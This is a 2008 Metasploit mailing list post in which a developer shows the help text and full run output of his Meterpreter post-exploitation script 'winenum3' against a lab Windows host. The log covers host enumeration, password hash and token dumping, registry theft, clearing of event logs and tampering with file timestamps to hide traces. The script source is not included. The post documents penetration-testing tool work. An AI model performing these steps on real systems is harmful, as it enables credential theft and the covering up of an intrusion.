Metasploit mailing list archives

Fwd: Script for automating Information Gathering in windows Hosts

From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Sun, 14 Dec 2008 22:25:40 -0400

Forgot to include the rest of the mailing list on the email

---------- Forwarded message ----------
From: Carlos Perez <carlos_perez at darkoperator.com>
Date: Sun, Dec 14, 2008 at 10:24 PM
Subject: Re: [framework] Script for automating Information Gathering in
windows Hosts
To: natron <natron at invisibledenizen.org>


Natron

I decided that the changes where easy so I took a couple of minutes and made
the changes here is the result. Now I only have to work on getting the exit
command to not bring the error message. You are given credit in the comments
and on the functions of the code I just copy pasted.  What do you think?

meterpreter > run winenum3 -h
Windows Local Enumerion Meterpreter Script by Darkoperator
Carlos Perez carlos_perez at darkoperator.com
Usage:

-h    This help message.

-m    Migrates the Meterpreter Session from it current process to a new one

-c    Changes Access Time, Modified Time and Created Time of executables
      that where run on the target machine and clear the EventLog

-r    Dumps, compresses and download entire Registry

[-] Error while running command run: exit
meterpreter > run winenum3 -m -c -r
[*] Launching hidden cmd.exe...
[*] Process 2676 created.
[*] Current process is cmd.exe (3740).  Migrating to 2676.
[*] Migration completed successfully.
[*] New server process: cmd.exe (2676)
[*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
[*] New session on 192.168.1.147:1050...
[*] Saving report to /tmp/192.168.1.147_20081214.173710156
[*] Checking if WIN2K301 is a Virtual Machine ........
[*]     This is a VMware Workstation/Fusion Virtual Machine

[*]     This is a VMWare virtual Machine
[*] Running Command List ...
[*]     running command cmd.exe /c set
[*]     running command arp -a
[*]     running command ipconfig /all
[*]     running command ipconfig /displaydns
[*]     running command route print
[*]     running command net view
[*]     running command netstat -na
[*]     running command netstat -ns
[*]     running command net share
[*]     running command net group
[*]     running command net user
[*]     running command net localgroup
[*]     running command net view /domain
[*]     running command netsh firewall show config
[*]     running command tasklist /svc
[*] Running WMIC Commands ....
[*]     running command wimic computersystem list
[*]     running command wimic useraccount list
[*]     running command wimic group
[*]     running command wimic service list brief
[*]     running command wimic volume list brief
[*]     running command wimic process list brief
[*]     running command wimic startup list full
[*]     running command wimic qfe
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Dumping and Downloading the Registry
[*]     Exporting HKCU
[*]     Compressing HKCU into cab file for faster download
[*]     Exporting HKLM
[*]     Compressing HKLM into cab file for faster download
[*]     Exporting HKCC
[*]     Compressing HKCC into cab file for faster download
[*]     Exporting HKCR
[*]     Compressing HKCR into cab file for faster download
[*]     Exporting HKU
[*]     Compressing HKU into cab file for faster download
[*]     Downloading HKCU.cab to -> /tmp/192.168.1.147-HKCU.cab
[*]     Downloading HKLM.cab to -> /tmp/192.168.1.147-HKLM.cab
[*]     Downloading HKCC.cab to -> /tmp/192.168.1.147-HKCC.cab
[*]     Downloading HKCR.cab to -> /tmp/192.168.1.147-HKCR.cab
[*]     Downloading HKU.cab to -> /tmp/192.168.1.147-HKU.cab
[*]     Deleting left over files
1
[*] Clearing Event Logs, this will leave and event 517
[*]     Clearing the security Event Log
[*]     Clearing the system Event Log
[*]     Clearing the application Event Log
[*]     Clearing the directory service Event Log
[*]     Clearing the dns server Event Log
[*]     Clearing the file replication service Event Log
[*] Alll Event Logs have been cleared
[*] Changing Access Time, Modified Time and Created Time of Files Used
[*]     Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\reg.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\route.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\net.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe
[*] Done!
meterpreter >
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081214/4e4cf686/attachment.htm>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: winenum3.rb
Type: application/x-ruby
Size: 13002 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081214/4e4cf686/attachment.rb>

Current thread:

Script for automating Information Gathering in windows Hosts Carlos Perez (Dec 14)
- Message not available
  - Message not available
    - Message not available
    - Message not available
    - Message not available
    - Fwd: Script for automating Information Gathering in windows Hosts Carlos Perez (Dec 14)
- Message not available
  - Message not available
    - Fwd: Script for automating Information Gathering in windows Hosts Carlos Perez (Dec 14)
    - Script for automating Information Gathering in windows Hosts Carlos Perez (Dec 22)